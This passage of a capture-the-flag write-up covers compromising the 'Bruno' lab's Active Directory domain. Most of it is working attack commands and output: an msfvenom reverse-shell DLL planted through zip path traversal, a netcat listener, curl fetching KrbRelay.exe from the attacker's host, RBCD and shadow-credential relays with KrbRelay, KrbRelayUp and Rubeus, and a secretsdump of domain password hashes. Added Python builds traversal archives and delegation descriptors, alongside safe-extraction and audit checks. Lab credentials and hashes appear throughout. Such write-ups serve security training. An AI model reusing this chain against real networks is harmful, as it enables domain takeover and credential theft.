INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: brunodc.bruno.vl
INFO: Done in 00M 05S

Creating the payload & using KrbRelay

For the payload I used an msfvenom reverse shell and saved it as Microsoft.DiaSymReader.Native.amd64.dll, and created the zip file with a path traversal using 7-Zip (renaming the zipped file to ../app/Microsoft.DiaSymReader.Native.amd64.dll).

 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f dll > Microsoft.DiaSymReader.Native.amd64.dll     
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-smbclient bruno/svc_net:Sunshine1@bruno.vl                                     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
queue
SYSVOL
# use queue
# rm evil3.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:15:54 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
# put Microsoft.DiaSymReader.Native.amd64.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:16:22 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
-rw-rw-rw-       1994  Mon Jun 10 04:16:22 2024 Microsoft.DiaSymReader.Native.amd64.zip
# 
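An added example of the zip step (Python, not the 7-Zip renaming the write-up used and not the target's code): the archive builder writes the traversal name verbatim, a naive extractor shows why the DLL lands in the sibling app directory, and a hardened extractor shows the check that would have stopped it. The queue and app directory names mirror the share and the traversal target above; the payload bytes are a placeholder, not a real DLL.

```python
from __future__ import annotations

import io
import os
import tempfile
import zipfile

# The member name from the write-up: escapes the extraction dir into its sibling 'app'.
# Forward slashes are what Windows extractors expect inside a zip, so this works there too.
TRAVERSAL_NAME = "../app/Microsoft.DiaSymReader.Native.amd64.dll"


def build_traversal_zip(payload: bytes, member_name: str = TRAVERSAL_NAME) -> bytes:
    """zipfile stores member names verbatim, so no renaming trick is needed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


def list_members(zip_bytes: bytes) -> list[str]:
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def naive_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """The vulnerable pattern: joins the attacker-controlled name onto dest and writes."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.normpath(os.path.join(dest, info.filename))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Resolve each final path and refuse anything outside dest (catches ../ and absolute names)."""
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"zip-slip rejected: {info.filename!r}")
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def would_reject(member_name: str) -> bool:
    """True if safe_extract refuses an archive that contains member_name."""
    archive = build_traversal_zip(b"x", member_name)
    with tempfile.TemporaryDirectory() as root:
        try:
            safe_extract(archive, root)
        except ValueError:
            return True
    return False


def demo() -> dict:
    """Extract the same archive into <root>/queue with both extractors and report the outcome."""
    archive = build_traversal_zip(b"MZ-placeholder, not a real DLL")
    with tempfile.TemporaryDirectory() as root:
        queue, app = os.path.join(root, "queue"), os.path.join(root, "app")
        os.makedirs(queue)
        os.makedirs(app)
        naive_extract(archive, queue)
        landed = os.path.isfile(os.path.join(app, "Microsoft.DiaSymReader.Native.amd64.dll"))
        try:
            safe_extract(archive, queue)
            rejected = False
        except ValueError:
            rejected = True
    return {"naive_escaped_to_app": landed, "safe_rejected": rejected}


if __name__ == "__main__":
    print(list_members(build_traversal_zip(b"x")))  # ['../app/Microsoft.DiaSymReader.Native.amd64.dll']
    print(demo())  # {'naive_escaped_to_app': True, 'safe_rejected': True}
```

Python's own ZipFile.extractall strips leading ../ components, so the naive loop here stands in for a hand-rolled extractor or an older library; the hardened version resolves the final path with realpath and compares it against the destination, which is the check any service unpacking user-supplied archives into a directory next to its binaries needs.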

 

Getting Root with Resource-Based Constrained Delegation (RBCD)

I used: https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelay.exe

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.84.244] 65278
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID                                           
============== ==============================================
bruno\svc_scan S-1-5-21-1536375944-4286418366-3447278137-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                          Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                               Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                       Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

c:\Users\svc_scan\Desktop>curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1581k  100 1581k    0     0  3664k      0 --:--:-- --:--:-- --:--:-- 3685k

c:\Users\svc_scan\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 123D-CFA3

 Directory of c:\Users\svc_scan\Desktop

06/10/2024  08:32 AM    <DIR>          .
06/29/2022  04:09 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/10/2024  08:32 AM         1,618,944 KrbRelay.exe
               3 File(s)      1,620,025 bytes
               2 Dir(s)  15,324,868,608 bytes free

c:\Users\svc_scan\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\svc_scan\Desktop> ./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\svc_scan\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABr15/LWcZ9/+EJA1xQswkDAsgAAAgP//9OCOsICNkdgCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 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
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046eaaccbc427c537bd34cfaad3ccfe07faa4cc962d5d69beb23751a7b161e376ba5ef59142de74e813e06d6168ec95cde528b4740c0c81d6e44a7dcb8880cd1cfaf1f3015610a007d87ee3d682637a6d952cbbde71f8696d20c62f3e9bca547a0eb1933e366562379501f7755ad4db3
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404429d0e40f70e6a4260c81b4b46a52e91a7459b6722a628653d073e9bfa243ceb1f619595cbadaeb7191cd7e3b0b32f0c3b0d78cfe0bb84f7a77250816d2dd30e49a692
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS
PS C:\Users\svc_scan\Desktop> 
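What -rbcd writes is a security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on BRUNODC$, granting the given SID the right to impersonate users to that host via S4U2Proxy. Added example (my code, not KrbRelay's or impacket's): it builds that self-relative descriptor by hand and parses one back, which is also how you audit the attribute afterwards. SID, ACL and ACE layouts are the documented Windows wire formats; the owner is BUILTIN\Administrators and the ACE mask 0x000F01FF (full control), matching what RBCD tooling writes; the SID is the one passed to -rbcd above.

```python
from __future__ import annotations

import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 0x04
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL = 0x000F01FF            # 983551: the mask RBCD tooling grants the impersonating principal
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
RBCD_SID = "S-1-5-21-1536375944-4286418366-3447278137-1116"   # the SID passed to -rbcd above


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"bad SID {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes, offset: int = 0) -> tuple[str, int]:
    """Parse a binary SID at offset; return (string form, offset just past it)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{count}I", data, offset + 8)
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, offset + 8 + 4 * count


def build_rbcd_sd(allowed_sids: list[str]) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR whose DACL holds one ACCESS_ALLOWED_ACE (full control) per SID."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)      # owner and primary group
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size, mask; then the trustee SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    # ACL header: revision, sbz1, size, ace count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    off_owner = 20                                    # SD header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + owner + dacl


def parse_rbcd_sd(blob: bytes) -> list[tuple[str, int]]:
    """(SID, access mask) for every ACCESS_ALLOWED ACE in the DACL; [] when no DACL is present."""
    _rev, _sbz, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _acl_rev, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", blob, off_dacl)
    pos = off_dacl + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(blob, pos + 8)
            allowed.append((sid, mask))
        pos += ace_size                               # skip ACE types we do not interpret
    return allowed


if __name__ == "__main__":
    sd = build_rbcd_sd([RBCD_SID])
    print(len(sd), sd.hex())
    print(parse_rbcd_sd(sd))   # [('S-1-5-21-1536375944-4286418366-3447278137-1116', 983551)]
```

To audit after an engagement (or to hunt for this as persistence), read msDS-AllowedToActOnBehalfOfOtherIdentity from every computer object over LDAP as raw bytes and run parse_rbcd_sd over it: any trustee SID you cannot tie to a legitimate front-end service is a principal that can impersonate users, including Administrator, to that host.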

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ evil-winrm -i bruno.vl -u 'Administrator' -p 'Puckie71#'         

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/29/2022   3:00 PM             37 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{b52<REDACTED>a7d}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Getting Root with Shadow Credentials (KrbRelayUp & Rubeus)

I used: https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelayUp.exe & Rubeus.exe

Valid CLSID from: https://vulndev.io/cheats-windows/

Also, LDAP signing must not be enforced (and LDAPS channel binding must be off), and the MachineAccountQuota must allow us to add a machine account. Both are checked below with crackmapexec.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          LDAP Signing NOT Enforced!
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          Channel Binding is set to "NEVER" - Time to PWN!
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq         
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
MAQ         brunodc.bruno.vl 389    BRUNODC          [*] Getting the MachineAccountQuota
MAQ         brunodc.bruno.vl 389    BRUNODC          MachineAccountQuota: 10

 

PS C:\temp> .\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM


[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] Generating certificate
[+] Certificate generated
[+] Generating KeyCredential
[+] KeyCredential generated with DeviceID 0367120a-5b1f-4343-92e6-87879f2831b7
[+] KeyCredential added successfully
[+] Certificate: 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
[+] Certificate Password: tL4#hQ9=yQ9$
[+] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[+] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\BRUNODC$'
[+] TGT request successful!
[+] Building S4U2self 
[+] Using domain controller: brunodc.bruno.vl (fe80::65c9:b4fb:c500:8a8b%6)
[+] Sending S4U2self request to fe80::65c9:b4fb:c500:8a8b%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'BRUNODC$@BRUNO.VL'
[+] Substituting in alternate service name: HOST/BRUNODC
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process         : 'C:\temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 4192
[+] Ticket successfully imported!
[+] LUID            : 0x3de849
[+] System service should be started in background
PS C:\temp> ./Rubeus.exe asktgt /user:brunodc$ /certificate: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 /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap
./Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSAIBAzCCCgQGCSqGSIb3DQEHAaCCCfUEggnxMIIJ7TCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAiTFGuPkmWo/QICB9AEggTY8eBgHRmL6P0olkDNHsW9tEm5dTU1d1BNpxnmp149Y/z+hE4jCc1Fx2cMLrsOH+XA/+JQzCg932Y0M8qzvsZPqbfkTy69KJIl45km9+PgbTsn0qLVSqSckioUQYGbJDusOgUW8qzelOQdWIP4KW9veDXTY5lqVKypNY9Bea3SvgL4lKFzqsit+IvUCJFnVdQ6o5TX7v9ZoHe5CjLEskKgTzGtlz6H1rzcGTAhNNke+uleyCKiiS8vskvnrIq0bYjH3LkODAq1rwMgfTrrrSXuhdwTCJb1EHSegQsW4IetK1IvPPbifvcZuOI8gKqkKDAOkj/d6EXIR5YULsi0IcveleSKVBr/UQZOBAR2KtUlr47s2aLuO7nAbYPxGMyoFWo0jmjgJFOgbQIVqxBprN7dXT9FFoR6jgwbWx1dtwiXAOubGt3ELLDah2L6gQeKd2VTdc/2LXnKlvIUtCTSnhgfdER4Ak68xWt9U9zzRg97jLzwoZPvXdpdFl2Pl0rgWJQcHBLa4ydEL3faSjhj3lRjTfk1p2m1MjvQ1k9m6SASbR9EdNmeDJZCN9j5dnFVam1A3G97GVtfmILGHdrJiKQ7lhC7eQuk187kEDfn7ZwnSBCeJw8aqsTBmb3c7rzOM3VSr8bS/b3dzyPjcks7WXROpA3dvPioAi7vqo5qjXkYbEqJ800yenaSDf2s207ctrkOuKqpY/FHPl+B+StR1p+WxUm8OrlPOCCQZS5CYjD+cy17lNLwlZFjrhMEfXfNyCGoU+flUdxKQoNu9R1crrc686xYOFzGjCZWGnlsxxfMszW4suZXtBrmYOOqZSAxDUI6p23plWyoKZsaETAsrjiQtuo23ooWIzUPbUSk0hFtuUu1wZXvDX5zboKUBu2Px3p23RvxcfQr80BF+rJqL+87Gx9vhh1UMsiLip8WwRFn9CQNOwAvy4tSjaRAqwEdXs6mB6X5pnsfTBVNT71ZVaD7uxjz7LS5BlTOYmHHGor9kf8VaY5zflN2Mq1U2aEPTLv4887aK8FW9EjxrYz6BlEhKwbpXh4G6FoZhtPjb6EM2ybf5twRnonYvs2qjGjNf1Pw6diUsxt7T/tMvHROBJHtfeK1k3Vy+GKiVM7L8XbwAJ8IzJDlZlgr2wDYbai9gJeGxOpFDpBBJd73YJaDm2pKf6hzwNvk6fv617DdvcQlnhut//LQYdqLLJAxi3CM4B4zkue2uYo0eoKqwWAybKypVJeQV1V1qMnypAlxPk+ZVIiqyE0sNmVNEYdtV23snWvwG311MPKlYCdrR/aRzQwWfcEMHfqt/UzrRgMKlsdiUM+h2im4Zf2mEXyK1BVrUXiH1F6f7EIHQ2PgKeyfF6U6lA5APDCexqxijlmnPVGo4LUayn+cCr9vYYe9fKnqTpW15QjJ54IXaH/83n8O+v/TpOa0WXCGBei+FcVThPj7FJC3MK5Z8gybMdTdNkz854lMxfFVkx43125BIe44iG2Owdd5R5GULfxE8o11t3uVXraaOvRJrQsyLy0c8oQLvLeK4S17UYmGLe9iRzuvS7bU/J2SeUNT4fjtjZzy1npcyqYfZOOEr/g8RZGUrHge8lO1Lq/CfRpgINLZKLB/oyXcpwgTOYzcOHZiYR19VEaOR3k5IfBPiC0OhTGB6TATBgkqhkiG9w0BCRUxBgQEAQAAADBXBgkqhkiG9w0BCRQxSh5IADYAMwA4AGUAYwBjADUANAAtADUANgBlAGYALQA0AGUANgA3AC0AYQAzAGUANQAtAGYANABlADAANgA1ADkA
OQAyADkAYQBhMHkGCSsGAQQBgjcRATFsHmoATQBpAGMAcgBvAHMAbwBmAHQAIABFAG4AaABhAG4AYwBlAGQAIABSAFMAQQAgAGEAbgBkACAAQQBFAFMAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByMIIDzwYJKoZIhvcNAQcGoIIDwDCCA7wCAQAwggO1BgkqhkiG9w0BBwEwHAYKKoZIhvcNAQwBAzAOBAgag/HdCMbLJQICB9CAggOIs/IV/NtXRAGigbov5vamiNpG1KItymxv/dQbMqDxPUj394IDCh8RAoAL9TNSGFGomsbe6PdH/GKzptOu2U0truO6dK3qmbph6I/eRfwuuyLl4ul68lhwGsb2L+Pw3kfGz5K16WM4av8kQ3+N/+f1yb49Ig+4EVLKCnTBFD4CT4SffxnbQ15iV4VuyUEihCmbQSixB4mz4jRx3hMLRYdtRGycxQj2pYssB2ynYG2GwQmYsj2FbO8H7pFDbyAAVfhqI4fPixpQkdGyY+JLca5RWFVeaclHSfqqx7cf9JAt03LdOhzx1hvVyF5Tj5E7rdH4HyO3yyrMwm6hexYthMsUr4H13mHja10j2topInfZXhy+eS+WvRwl6AjUCL9mix0lZxo+vnLa4OF9jRg+QB2J0elZ9SWDxXs4pm+6fGXsAtqFJT9eYMaVxjKZlAg/KDYjU2so8ufuVamL7Ug8YmjTqmn9/ioleK/HjmRT+F/2rZ5qKAop+KCY67TJye1hwJGXTwe1gaJIH9lUJEbQFcFUMDxsj9CjGA+N6t7vB4AxTfKIdBoWioe8uDofHqqPknOwrgUFKiH+9kI/Ht/f0xLn8ZgYcGC/8wh4PUhG3yykCNr6IIpbKTTGmhLKR0nEIgKKxzvo3xsN3tYCgTcNAul9gQqZE1cDE8XYQx28JhHvaIRBejsJ1WEbQcNYAMGNYJHp4Prb3k99Jx9mMFYj+VukVVo9Kr6a+oYGOcL04p/b1KhssD9GKMQzAd8/SGFuyacNu4nlgazim+5nin+qPKzzIxA7Io0nMlCo6EHvOTD78yUNdo7C6m9Qr2210dUDjvz2taswmhJ6veYnHV7ULPzK7YmOFy0S+ckCQpeqdtaX5/fF1IDfvJ3+hZQ+JHTc/3TtGMWJzCX4i5KAa/kcFIhcNAkDcy3dby9X3hNf3p2xVQvKk2MNH3ip6SdNopJBNKZ8ioFTQVxcBMMq5JWHqN8PQk6xvuwbUDhS491WjAHpmqLXR12P+PDqajoaUeqrXy7YeCqvYGf+6n+hQFBGydJQgPz9D7uahG7TIllhyLESbKV8NlbpXPwnuudQab1eiwAWMseuozpz0Bce2IDLDPme5R9xAbaYOoRP+9AxJmnfEvbk15TSJ12VcsjCQ/V8Z8ZEqKIlFe6lkKmutgwVq2zCrTdwwDmMf1sK0/qW1X0cuy8iNamaLD6k3TA7MB8wBwYFKw4DAhoEFMR8gBe8L3l342xpFeyDL0lIHbyrBBTj00x02ItJAnsa2A3vMAAAJpvrSwICB9A= /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: bruno.vl
[*] Using salt: BRUNO.VLhostbrunodc.bruno.vl
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\brunodc$'
[*] Using domain controller: fe80::65c9:b4fb:c500:8a8b%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      --snip--

  ServiceName              :  krbtgt/bruno.vl
  ServiceRealm             :  BRUNO.VL
  UserName                 :  brunodc$ (NT_PRINCIPAL)
  UserRealm                :  BRUNO.VL
  StartTime                :  6/10/2024 11:45:03 AM
  EndTime                  :  6/10/2024 9:45:03 PM
  RenewTill                :  6/17/2024 11:45:03 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  vdTKMjX5qHweT0c+CbsOSLpJQHmRr0I5Uh/fI0wx5BQ=
  ASREP (key)              :  F312EF7E042FED8F03C8862145DAAD54EC9A2CB14C510C885EADA1BBAF3D5C9B

PS C:\temp> 


┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nano bruno.ticket
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ cat bruno.ticket | base64 -d > bruno.ticket.kirbi
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-ticketConverter bruno.ticket.kirbi bruno.ticket.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ export KRB5CCNAME=bruno.ticket.ccache               
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ klist
Command 'klist' not found, did you mean:
  command 'flist' from deb mmh
  command 'flist' from deb nmh
  command 'mlist' from deb mblaze
Try: sudo apt install <deb name>
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-secretsdump 'brunodc$'@brunodc.bruno.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:137<REDACTED>fd4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:926afc778f7a1406b77513d875520c6f:::
bruno.vl\svc_net:1103:aad3b435b51404eeaad3b435b51404ee:c4f34b79030a4329c7929a71c79baf38:::
bruno.vl\svc_scan:1104:aad3b435b51404eeaad3b435b51404ee:c4f34b79030a4329c7929a71c79baf38:::
bruno.vl\Chloe.Ball:1106:aad3b435b51404eeaad3b435b51404ee:4efe75a82ece893bd878ca66c04e1cc5:::
bruno.vl\Kayleigh.Patel:1107:aad3b435b51404eeaad3b435b51404ee:821550a6d75171382849d63e3c12dad1:::
bruno.vl\Donna.Harrison:1108:aad3b435b51404eeaad3b435b51404ee:120ca8e1b8d4fecc5d7417b638f30d0c:::
bruno.vl\Charles.Young:1109:aad3b435b51404eeaad3b435b51404ee:3d50f4c837cef7cf5143767553b6cc19:::
bruno.vl\Graeme.Grant:1110:aad3b435b51404eeaad3b435b51404ee:e5b5bc6a01fd48adc0f67a71629b5c19:::
bruno.vl\Natalie.Anderson:1111:aad3b435b51404eeaad3b435b51404ee:880c8cb0afc411db5d4b8a3159577d44:::
bruno.vl\Sam.Owen:1112:aad3b435b51404eeaad3b435b51404ee:830681ca97d7f828f939e5f9cdfed754:::
bruno.vl\Jeremy.Singh:1113:aad3b435b51404eeaad3b435b51404ee:8b1263356938ce9d149f3518e67b9959:::
bruno.vl\Kieran.Day:1114:aad3b435b51404eeaad3b435b51404ee:2f80b61c70a348160f4632cef9a6215b:::
bruno.vl\Hugh.Young:1115:aad3b435b51404eeaad3b435b51404ee:78eef081a8838baca1f2f547ce6f935a:::
